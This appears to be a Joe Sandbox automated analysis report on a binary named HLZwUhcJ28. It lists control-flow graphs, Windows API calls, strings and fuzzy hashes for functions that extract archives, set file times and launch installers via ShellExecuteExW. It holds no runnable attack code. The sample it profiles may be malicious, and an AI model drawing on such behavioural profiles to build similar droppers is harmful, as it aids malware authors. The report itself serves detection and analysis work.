                                                                                                                                                                          control_flow_graph 2087 7ff70ecf3030-7ff70ecf3073 2088 7ff70ecf33e4-7ff70ecf3409 call 7ff70ecd1b70 call 7ff70ecf5c30 2087->2088 2089 7ff70ecf3079-7ff70ecf30b5 call 7ff70ecf74c0 2087->2089 2095 7ff70ecf30ba-7ff70ecf30c1 2089->2095 2096 7ff70ecf30b7 2089->2096 2098 7ff70ecf30c3-7ff70ecf30c7 2095->2098 2099 7ff70ecf30d2-7ff70ecf30d6 2095->2099 2096->2095 2102 7ff70ecf30cc-7ff70ecf30d0 2098->2102 2103 7ff70ecf30c9 2098->2103 2100 7ff70ecf30db-7ff70ecf30e6 2099->2100 2101 7ff70ecf30d8 2099->2101 2104 7ff70ecf30ec 2100->2104 2105 7ff70ecf3178 2100->2105 2101->2100 2102->2100 2103->2102 2106 7ff70ecf30f2-7ff70ecf30f9 2104->2106 2107 7ff70ecf317c-7ff70ecf317f 2105->2107 2108 7ff70ecf30fe-7ff70ecf3103 2106->2108 2109 7ff70ecf30fb 2106->2109 2110 7ff70ecf3181-7ff70ecf3185 2107->2110 2111 7ff70ecf3187-7ff70ecf318a 2107->2111 2112 7ff70ecf3135-7ff70ecf3140 2108->2112 2113 7ff70ecf3105 2108->2113 2109->2108 2110->2111 2114 7ff70ecf31b0-7ff70ecf31c3 call 7ff70ecd7b68 2110->2114 2111->2114 2115 7ff70ecf318c-7ff70ecf3193 2111->2115 2116 7ff70ecf3145-7ff70ecf314a 2112->2116 2117 7ff70ecf3142 2112->2117 2118 7ff70ecf311a-7ff70ecf3120 2113->2118 2132 7ff70ecf31c5-7ff70ecf31e3 call 7ff70ece0aa0 2114->2132 2133 7ff70ecf31e8-7ff70ecf323d call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecd587c call 7ff70ecd1b70 2114->2133 2115->2114 2119 7ff70ecf3195-7ff70ecf31ac 2115->2119 2121 7ff70ecf3150-7ff70ecf3157 2116->2121 2122 7ff70ecf340a-7ff70ecf3411 2116->2122 2117->2116 2123 7ff70ecf3122 2118->2123 2124 7ff70ecf3107-7ff70ecf310e 2118->2124 2119->2114 2126 7ff70ecf315c-7ff70ecf3162 2121->2126 2127 7ff70ecf3159 2121->2127 2128 7ff70ecf3416-7ff70ecf341b 2122->2128 2129 7ff70ecf3413 2122->2129 2123->2112 2130 7ff70ecf3113-7ff70ecf3118 2124->2130 2131 7ff70ecf3110 2124->2131 2126->2122 2136 7ff70ecf3168-7ff70ecf3172 2126->2136 2127->2126 2137 7ff70ecf341d-7ff70ecf3424 2128->2137 2138 7ff70ecf342e-7ff70ecf3436 2128->2138 2129->2128 2130->2118 2139 7ff70ecf3124-7ff70ecf312b 2130->2139 2131->2130 2132->2133 2154 7ff70ecf3292-7ff70ecf329f ShellExecuteExW 2133->2154 2155 7ff70ecf323f-7ff70ecf328d call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecd72ac call 7ff70ecd1b70 2133->2155 2136->2105 2136->2106 2142 7ff70ecf3426 2137->2142 2143 7ff70ecf3429 2137->2143 2144 7ff70ecf343b-7ff70ecf3446 2138->2144 2145 7ff70ecf3438 2138->2145 2146 7ff70ecf3130 2139->2146 2147 7ff70ecf312d 2139->2147 2142->2143 2143->2138 2144->2107 2145->2144 2146->2112 2147->2146 2156 7ff70ecf32a5-7ff70ecf32af 2154->2156 2157 7ff70ecf3396-7ff70ecf339e 2154->2157 2155->2154 2159 7ff70ecf32b1-7ff70ecf32b4 2156->2159 2160 7ff70ecf32bf-7ff70ecf32c2 2156->2160 2161 7ff70ecf33d2-7ff70ecf33df 2157->2161 2162 7ff70ecf33a0-7ff70ecf33b6 2157->2162 2159->2160 2164 7ff70ecf32b6-7ff70ecf32bd 2159->2164 2165 7ff70ecf32c4-7ff70ecf32cf IsWindowVisible 2160->2165 2166 7ff70ecf32de-7ff70ecf32f1 WaitForInputIdle call 7ff70ecf3928 2160->2166 2161->2088 2167 7ff70ecf33cd call 7ff70ecf5b1c 2162->2167 2168 7ff70ecf33b8-7ff70ecf33cb 2162->2168 2164->2160 2170 7ff70ecf3333-7ff70ecf3340 CloseHandle 2164->2170 2165->2166 2171 7ff70ecf32d1-7ff70ecf32dc ShowWindow 2165->2171 2180 7ff70ecf32f6-7ff70ecf32fd 2166->2180 2167->2161 2168->2167 2173 7ff70ecf344b-7ff70ecf3453 call 7ff70ecfae94 2168->2173 2178 7ff70ecf3355-7ff70ecf335c 2170->2178 2179 7ff70ecf3342-7ff70ecf3353 call 7ff70ece0aa0 2170->2179 2171->2166 2184 7ff70ecf337e-7ff70ecf3380 2178->2184 2185 7ff70ecf335e-7ff70ecf3361 2178->2185 2179->2178 2179->2184 2180->2170 2186 7ff70ecf32ff-7ff70ecf3302 2180->2186 2184->2157 2190 7ff70ecf3382-7ff70ecf3385 2184->2190 2185->2184 2189 7ff70ecf3363-7ff70ecf3378 2185->2189 2186->2170 2191 7ff70ecf3304-7ff70ecf3315 GetExitCodeProcess 2186->2191 2189->2184 2190->2157 2194 7ff70ecf3387-7ff70ecf3395 ShowWindow 2190->2194 2191->2170 2192 7ff70ecf3317-7ff70ecf332c 2191->2192 2192->2170 2194->2157
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: .exe$.inf$Install$p
                                                                                                                                                                          • API String ID: 148627002-3607691742
                                                                                                                                                                          • Opcode ID: 6deefb2a834960e7b68e4e93846fd8f06666f90d337fa731353736b6af53a45e
                                                                                                                                                                          • Instruction ID: bc6cb0a1fd5c1c190a4e6804d654ae8e49f2870e53aa99ada0531ccd41c3d204
                                                                                                                                                                          • Opcode Fuzzy Hash: 6deefb2a834960e7b68e4e93846fd8f06666f90d337fa731353736b6af53a45e
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FC18E22F1C682B5EB10EB69DD6427EA7A1EF85B80F848035DE4D477A4DF3EE4558320
                                                                                                                                                                          Function 00007FF70ECF2BF4 Relevance: 16.6, APIs: 11, Instructions: 102windowCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3569833718-0
                                                                                                                                                                          • Opcode ID: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
                                                                                                                                                                          • Instruction ID: c0cd67dca3221b64d7b5df7e898d3f4f0374393f229566268bd28240e81c80aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E41BF3AB146468AF720AF71ED10BEE6761EF49B98F844232DD1A47BA4CF3DD4458720
                                                                                                                                                                          Function 00007FF70ECE218C Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 7COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 2237 7ff70ece218c-7ff70ece219f call 7ff70ecf57cc
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                          • String ID: AES-0017$map/set too long$z01$zip$zipx$zx01
                                                                                                                                                                          • API String ID: 909987262-704999473
                                                                                                                                                                          • Opcode ID: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                                                                                                                                                          • Instruction ID: 471931232284c129dfa9fc8a37bd333e100af5f01928caa8156b72a01d74fb39
                                                                                                                                                                          • Opcode Fuzzy Hash: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                                                                                                                                                          • Instruction Fuzzy Hash: 1FB01218D3410ED0D02CF7808C550648310DF14700ED00C31C31C8FC910F3874424213
                                                                                                                                                                          Function 00007FF70ECD46A0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 2291 7ff70ecd46a0-7ff70ecd46db 2292 7ff70ecd46e6 2291->2292 2293 7ff70ecd46dd-7ff70ecd46e4 2291->2293 2294 7ff70ecd46e9-7ff70ecd4758 2292->2294 2293->2292 2293->2294 2295 7ff70ecd475d-7ff70ecd4788 CreateFileW 2294->2295 2296 7ff70ecd475a 2294->2296 2297 7ff70ecd478e-7ff70ecd47be GetLastError call 7ff70ecd80b0 2295->2297 2298 7ff70ecd4868-7ff70ecd486d 2295->2298 2296->2295 2304 7ff70ecd47c0-7ff70ecd480a CreateFileW GetLastError 2297->2304 2305 7ff70ecd480c 2297->2305 2299 7ff70ecd4873-7ff70ecd4877 2298->2299 2302 7ff70ecd4885-7ff70ecd4889 2299->2302 2303 7ff70ecd4879-7ff70ecd487c 2299->2303 2307 7ff70ecd48af-7ff70ecd48c3 2302->2307 2308 7ff70ecd488b-7ff70ecd488f 2302->2308 2303->2302 2306 7ff70ecd487e 2303->2306 2311 7ff70ecd4812-7ff70ecd481a 2304->2311 2305->2311 2306->2302 2309 7ff70ecd48c5-7ff70ecd48d0 2307->2309 2310 7ff70ecd48ec-7ff70ecd4915 call 7ff70ecf5c30 2307->2310 2308->2307 2312 7ff70ecd4891-7ff70ecd48a9 SetFileTime 2308->2312 2313 7ff70ecd48d2-7ff70ecd48da 2309->2313 2314 7ff70ecd48e8 2309->2314 2315 7ff70ecd4853-7ff70ecd4866 2311->2315 2316 7ff70ecd481c-7ff70ecd4833 2311->2316 2312->2307 2318 7ff70ecd48df-7ff70ecd48e3 call 7ff70ecd1c80 2313->2318 2319 7ff70ecd48dc 2313->2319 2314->2310 2315->2299 2320 7ff70ecd4835-7ff70ecd4848 2316->2320 2321 7ff70ecd484e call 7ff70ecf5b1c 2316->2321 2318->2314 2319->2318 2320->2321 2324 7ff70ecd4916-7ff70ecd491b call 7ff70ecfae94 2320->2324 2321->2315
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3536497005-0
                                                                                                                                                                          • Opcode ID: 64065e44ed69f287c1fc4df0ebb383c09c812fcb12eb8c70a13a9516b9cf0ef5
                                                                                                                                                                          • Instruction ID: 37746da03d2a724053b0e7891833b4511853a9795220d0564e01261d4ba760f7
                                                                                                                                                                          • Opcode Fuzzy Hash: 64065e44ed69f287c1fc4df0ebb383c09c812fcb12eb8c70a13a9516b9cf0ef5
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C61F266A1878195E724AB29E84036EA7A1FF857A8F500335DFBD43AD8CF3ED464C710
                                                                                                                                                                          Function 00007FF70ECDE7C0 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2092733347-0
                                                                                                                                                                          • Opcode ID: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                                                                                                                                                          • Instruction ID: a19c72c001729773d66e26988bb9945b26654f3ba93dd6b6ed73b0c8bed8685f
                                                                                                                                                                          • Opcode Fuzzy Hash: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                                                                                                                                                          • Instruction Fuzzy Hash: 09311562B146519EFB00DFB5D8802AC7770FF18758B94503AEE0EA7A98EB38D895C310
                                                                                                                                                                          Function 00007FF70ECEEB64 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadBitmapW.USER32 ref: 00007FF70ECEEB7A
                                                                                                                                                                          • GetObjectW.GDI32 ref: 00007FF70ECEEBAB
                                                                                                                                                                          • DeleteObject.GDI32 ref: 00007FF70ECEEBE5
                                                                                                                                                                          • DeleteObject.GDI32 ref: 00007FF70ECEEC15
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF70ECF4517), ref: 00007FF70ECEC279
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF70ECF4517), ref: 00007FF70ECEC295
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF70ECF4517), ref: 00007FF70ECEC2AF
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF70ECF4517), ref: 00007FF70ECEC2C1
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: GlobalAlloc.KERNELBASE ref: 00007FF70ECEC2E2
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: GlobalLock.KERNEL32 ref: 00007FF70ECEC2F7
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: CreateStreamOnHGlobal.COMBASE ref: 00007FF70ECEC324
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF70ECEC3A5
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: GlobalUnlock.KERNEL32 ref: 00007FF70ECEC3C8
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: GlobalFree.KERNEL32 ref: 00007FF70ECEC3D1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                          • String ID: ]
                                                                                                                                                                          • API String ID: 1797374341-3352871620
                                                                                                                                                                          • Opcode ID: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                          • Instruction ID: 6703028db3c2a2f312cf263babf5c7eaaa3f13ec50ab94bd0f83bfe19934f465
                                                                                                                                                                          • Opcode Fuzzy Hash: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                          • Instruction Fuzzy Hash: 73118621F0D64655EA14BB61DE5477AF291EF88BC8F880035DD4E47B96DF2EE8049620
                                                                                                                                                                          Function 00007FF70ECD5DB8 Relevance: 7.7, APIs: 5, Instructions: 163filetimeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 2361 7ff70ecd5db8-7ff70ecd5df8 2362 7ff70ecd5e02 2361->2362 2363 7ff70ecd5dfa-7ff70ecd5e00 2361->2363 2364 7ff70ecd5e05-7ff70ecd5e08 2362->2364 2363->2362 2363->2364 2365 7ff70ecd5e12 2364->2365 2366 7ff70ecd5e0a-7ff70ecd5e10 2364->2366 2367 7ff70ecd5e15-7ff70ecd5e18 2365->2367 2366->2365 2366->2367 2368 7ff70ecd5e22 2367->2368 2369 7ff70ecd5e1a-7ff70ecd5e20 2367->2369 2370 7ff70ecd5e25-7ff70ecd5e33 call 7ff70ecd5890 2368->2370 2369->2368 2369->2370 2373 7ff70ecd5e35-7ff70ecd5e38 2370->2373 2374 7ff70ecd5e48-7ff70ecd5e4a 2370->2374 2373->2374 2375 7ff70ecd5e3a-7ff70ecd5e46 call 7ff70ecd5ff4 2373->2375 2376 7ff70ecd5e4d-7ff70ecd5e55 2374->2376 2375->2376 2377 7ff70ecd5e57 2376->2377 2378 7ff70ecd5e5a-7ff70ecd5e89 CreateFileW 2376->2378 2377->2378 2380 7ff70ecd5e8f-7ff70ecd5eb6 call 7ff70ecd80b0 2378->2380 2381 7ff70ecd5f4c-7ff70ecd5f4f 2378->2381 2393 7ff70ecd5eee-7ff70ecd5ef6 2380->2393 2394 7ff70ecd5eb8-7ff70ecd5eea CreateFileW 2380->2394 2384 7ff70ecd5f51-7ff70ecd5f59 call 7ff70ecde734 2381->2384 2385 7ff70ecd5f5e-7ff70ecd5f61 2381->2385 2384->2385 2386 7ff70ecd5f63-7ff70ecd5f6a call 7ff70ecde734 2385->2386 2387 7ff70ecd5f6f-7ff70ecd5f72 2385->2387 2386->2387 2391 7ff70ecd5f74-7ff70ecd5f7c call 7ff70ecde734 2387->2391 2392 7ff70ecd5f81-7ff70ecd5fbf SetFileTime CloseHandle 2387->2392 2391->2392 2396 7ff70ecd5fc1-7ff70ecd5fc7 call 7ff70ecd5ff4 2392->2396 2397 7ff70ecd5fcc-7ff70ecd5feb call 7ff70ecf5c30 2392->2397 2398 7ff70ecd5f2e-7ff70ecd5f46 2393->2398 2399 7ff70ecd5ef8-7ff70ecd5f0e 2393->2399 2394->2393 2396->2397 2398->2381 2398->2397 2401 7ff70ecd5f10-7ff70ecd5f23 2399->2401 2402 7ff70ecd5f29 call 7ff70ecf5b1c 2399->2402 2401->2402 2404 7ff70ecd5fec-7ff70ecd5ff3 call 7ff70ecfae94 2401->2404 2402->2398
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2398171386-0
                                                                                                                                                                          • Opcode ID: f20cc6b91e24e5c13e9133321993dce3257c4d33c318f0f139d1affa32006537
                                                                                                                                                                          • Instruction ID: 343a993c9aedfe7b0afcc5e80a83396c8fbcd6149c4f75992febd5749d0c3953
                                                                                                                                                                          • Opcode Fuzzy Hash: f20cc6b91e24e5c13e9133321993dce3257c4d33c318f0f139d1affa32006537
                                                                                                                                                                          • Instruction Fuzzy Hash: BC51C472B1CB42A9FB60EB65EC403BEA3A1AF447A8F844235DE1D47AD4DF3E94458310
                                                                                                                                                                          Function 00007FF70ECF3928 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3621893840-0
                                                                                                                                                                          • Opcode ID: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
                                                                                                                                                                          • Instruction ID: 8f2233786a57235a538821d2c280ccae13e3609c3ddc82077d488b3e167748de
                                                                                                                                                                          • Opcode Fuzzy Hash: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 1AF04F22F38486A2F750A734FC59BBAA211EFA4705FD41030D94E428A59F3CD549CB20
                                                                                                                                                                          Function 00007FF70ECEE96C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1266772231-0
                                                                                                                                                                          • Opcode ID: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                                                                                                                                                          • Instruction ID: 0b73392a0e47a04c896eeb8991f0062eca8e2318d5f4e4a3c9abe3972a0ee4b1
                                                                                                                                                                          • Opcode Fuzzy Hash: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                                                                                                                                                          • Instruction Fuzzy Hash: 32F0EC36F3855292EB90AB70FD55AB6A361FF94749FC05431E64E829A4DF2CD508CB10
